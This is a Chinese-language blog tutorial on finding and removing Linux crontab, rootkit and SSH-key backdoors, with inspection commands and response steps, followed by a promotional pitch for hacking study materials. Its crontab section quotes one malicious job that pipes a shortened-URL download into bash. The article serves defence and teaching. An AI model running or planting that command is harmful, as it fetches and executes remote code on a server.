一文看懂 Linux 隐藏后门:计划任务、Rootkit、SSH 后门
前言
在 Linux 服务器入侵事件里,攻击者拿到权限后,首要目标不是立刻破坏业务,而是留下隐藏后门。就算管理员修改密码、杀掉恶意进程,只要后门存在,攻击者依旧可以再次拿下服务器。
很多普通木马容易被ps、top命令发现,但隐藏后门往往更隐蔽:有的藏在定时任务里开机自启,有的在内核层面隐藏进程,还有的直接利用 SSH 实现免密登录。很多运维甚至初级安全人员排查时很容易漏掉这一类后门。
本文重点拆解 Linux 最常见的三类隐藏后门:计划任务后门、Rootkit 内核后门、SSH 免密后门,包含原理、特征、排查命令和清除方法,适合应急响应、服务器安全巡检。
⚠️ 法律声明:本文仅用于企业授权环境下安全自查与网络安全学习,禁止在未授权的服务器上进行测试、植入后门,未经授权的入侵行为属于违法犯罪。
一、计划任务后门:最常用的持久化隐藏后门
计划任务(Crontab)是攻击者最喜欢的持久化方式,简单、稳定、不容易被重视。就算恶意程序被 kill,到了定时时间会自动重新下载执行木马。
1. 原理
Linux crontab 可以按照分钟、小时、天执行指定命令。攻击者写入恶意任务,定时拉取远端脚本、启动反弹 shell 或者挖矿程序。
分为用户级 crontab和系统级 crontab,很多人只查 root 的 crontab,忽略系统 cron 目录,导致后门遗漏。
2. 恶意计划任务典型特征
- 任务执行
curl/wget下载外网脚本,直接管道交给 bash 执行; - 脚本存放路径在
/tmp、/dev/shm这类临时目录; - 命令存在大量 base64 编码字符串,解码后执行恶意 shell;
- 任务周期很短,每几分钟执行一次;
- 任务文件名字乱码、隐藏文件(
.开头),放在/etc/cron.d。
示例恶意 crontab:
*/3 * * * * root curl shturl.cc/Bufw7RLUoTUd | bash3. 完整排查命令
# 查看当前用户crontab crontab -l # 查看root用户crontab crontab -u root -l # 系统级cron配置文件 cat /etc/crontab ls -l /etc/cron.d/ ls -l /etc/cron.hourly/ ls -l /etc/cron.daily/ ls -l /etc/cron.weekly/ ls -l /etc/cron.monthly/4. 清理方法
- 直接编辑删除:
crontab -e,删掉恶意任务行; - 删除
/etc/cron.d下陌生任务文件; - 检查并删除任务中下载的恶意脚本文件;
- 检查其他普通用户的 crontab,攻击者不一定只用 root 账号。
坑点提醒:部分攻击者会在 crontab 里写空行、注释混淆视线,或者将命令拆分成多行、使用变量绕过简单筛查。
二、Rootkit 后门:内核级隐藏,普通命令看不见进程
Rootkit 属于高级隐藏后门,也是应急排查中最难处理的一类。普通木马是应用层程序,而 Rootkit 一般是内核模块,可以劫持系统调用,让ps、top、netstat看不到恶意进程、文件、端口。
1. 原理
Rootkit(内核木马)加载 ko 内核模块,劫持系统函数:
- 劫持
readdir:读取目录时,过滤掉恶意文件名; - 劫持
getdents:过滤恶意进程 PID,ps、top 看不到进程; - 劫持网络相关调用:netstat 看不到恶意监听端口。
简单来说:系统命令被 “欺骗”,攻击者的程序明明在运行,但是常规命令看不到。
2. Rootkit 典型特征
ps、top看不到可疑进程,但服务器 CPU / 内存异常占用;/proc目录中存在 ps 无法展示的 PID;lsmod查看内核模块,出现不知名、无描述的.ko模块;- 执行
uname -a信息被篡改,系统版本异常; - 某些恶意文件无法删除,删除后自动恢复。
3. 排查思路
无法单纯依赖 ps、top,需要绕过被劫持的系统工具。
# 查看加载的内核模块 lsmod # 查看/proc下所有pid,对比ps输出,找出隐藏PID ls /proc | grep -E "[0-9]+" # 检查模块是否被隐藏,查看内核日志 dmesg | grep -i module进阶方案:
使用静态编译的独立ps、ls二进制文件放到服务器上执行,避免系统自带命令被 Rootkit 劫持。
4. 清除方法
Rootkit 清理难度很高:
- 尝试卸载可疑内核模块:
rmmod xxx.ko;很多 Rootkit 会防止卸载,直接 rmmod 失败; - 找到 ko 文件删除;
- 若内核模块无法卸载,最佳方案是备份业务数据后重装系统。
重点:一旦确认存在内核 Rootkit,不建议单纯清理,攻击者已经拿到最高内核权限,很难保证完全清除后门。
三、SSH 后门:免密登录,无声的永久入口
SSH 后门是入侵中高频出现的持久化方式,不需要新增系统账号,不占用后台进程,非常隐蔽。攻击者只需要把自己的公钥写入目标服务器的 authorized_keys,之后不用密码就能登录服务器。
1. 原理
SSH 公钥认证机制:将攻击者的公钥写入服务器用户家目录下~/.ssh/authorized_keys,攻击者使用对应私钥即可免密登录。
不管是 root 账号还是普通用户,只要写入公钥,就能登录。很多人只检查 root,忽略普通业务账号。
2. SSH 后门常见变种
- 直接追加公钥到
authorized_keys(最常见); - 创建
.ssh隐藏目录,修改目录权限,防止管理员查看; - 修改 sshd 配置:开启 PermitRootLogin yes,放行 root 远程登录;
- 替换 sshd 二进制文件,制作 sshd 劫持后门(高级);
- 在多个用户下批量植入公钥,防止清理一个账号就失效。
3. 排查命令
# 遍历所有用户,检查.ssh目录 ls -l /home/*/.ssh/ ls -l /root/.ssh/ # 查看authorized_keys内容,检查陌生公钥 cat /root/.ssh/authorized_keys cat /home/*/.ssh/authorized_keys检查 sshd 配置:
cat /etc/ssh/sshd_config重点关注:PermitRootLogin、AuthorizedKeysFile等配置项。
4. 清理与加固
- 打开
authorized_keys,删除陌生公钥,不要直接清空,避免把自己的公钥删掉; - 检查
.ssh目录权限,目录权限建议 700,authorized_keys 权限 600; - 关闭不必要的 root 远程 SSH 登录;
- 禁止服务器普通用户随意上传公钥;
- 定期巡检所有用户的.ssh 目录。
踩坑:攻击者会在公钥前面加
command="xxx",限制登录执行命令,这类公钥同样属于后门,很容易被忽略。
四、三类后门快速对比表
表格
| 后门类型 | 隐藏程度 | 排查难度 | 核心风险 |
|---|---|---|---|
| Crontab 计划任务 | 中等 | 低 | 定时拉起木马,重启自动恢复 |
| SSH 免密后门 | 高 | 低 | 无进程,随时免密登录 |
| Rootkit 内核后门 | 极高 | 高 | 劫持系统命令,常规排查失效 |
五、一站式巡检命令(应急可直接复制执行)
# 1. 检查crontab crontab -u root -l ls /etc/cron.d # 2. 检查ssh公钥 ls /root/.ssh ls /home/*/.ssh # 3. 检查内核模块 lsmod # 4. 查看最近新增可疑文件 find /tmp /dev/shm /var/tmp -mtime -1 -type f # 5. 查看登录日志 last lastlog六、发现隐藏后门的应急处理步骤
- 保留现场优先:不要立刻重启服务器,重启可能丢失进程、内存证据;
- 隔离主机:断开服务器外网,防止攻击者继续操作、横向渗透内网;
- 定位后门类型:区分是计划任务、SSH 公钥还是 Rootkit;
- 逐层清理:删除恶意文件、清除定时任务、删除陌生 SSH 公钥;
- 评估危害:检查攻击者是否下载窃取数据、横向访问内网其他机器;
- 修复入口:查找攻击者是弱密码、漏洞上传还是 webshell 进来;
- 复盘加固:修改所有账号密码,开启日志审计,定期巡检。
重要提醒:如果确认是 Rootkit 内核后门,清理风险很大,就算删除模块,也无法确认攻击者是否留有其他隐藏入口,优先评估重装系统。
结尾
Linux 隐藏后门各有特点:Crontab 简单粗暴、SSH 后门悄无声息,Rootkit 最难清除。很多入侵事件中攻击者会组合使用多种后门,比如植入 SSH 公钥的同时添加 crontab 任务,就算其中一个后门被清除,另一个还能继续使用。
日常服务器安全巡检不能只看进程和 CPU,需要多维度交叉验证:文件、计划任务、账号、SSH 密钥、内核模块。养成定期巡检的习惯,才能在攻击者潜伏阶段就发现隐患。
网络安全攻防一直在迭代,新的后门技术不断出现。本文覆盖的是生产环境最常见的三类隐藏后门,属于应急响应基础技能,适合运维转网安、渗透测试入门学习。
免责声明:本文仅用于网络安全学习、企业授权环境安全自查。任何未经授权访问、植入后门、入侵计算机系统,均触犯相关法律法规,作者不承担任何非法使用带来的法律责任。
了解网络安全,首先要搞清楚下面这些前提
- 网络安全到底包含哪些技术?是否需要会编程?
- 网络安全行业有哪些职业方向?“我”该如何选择?
- 网络安全的职业发展和成长路线是什么?
如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
一、网络安全(黑客)学习路线
网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网络安全教程视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
三、网络安全CTF实战案例
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
四、网络安全面试题
最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。
网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。
机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!
这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】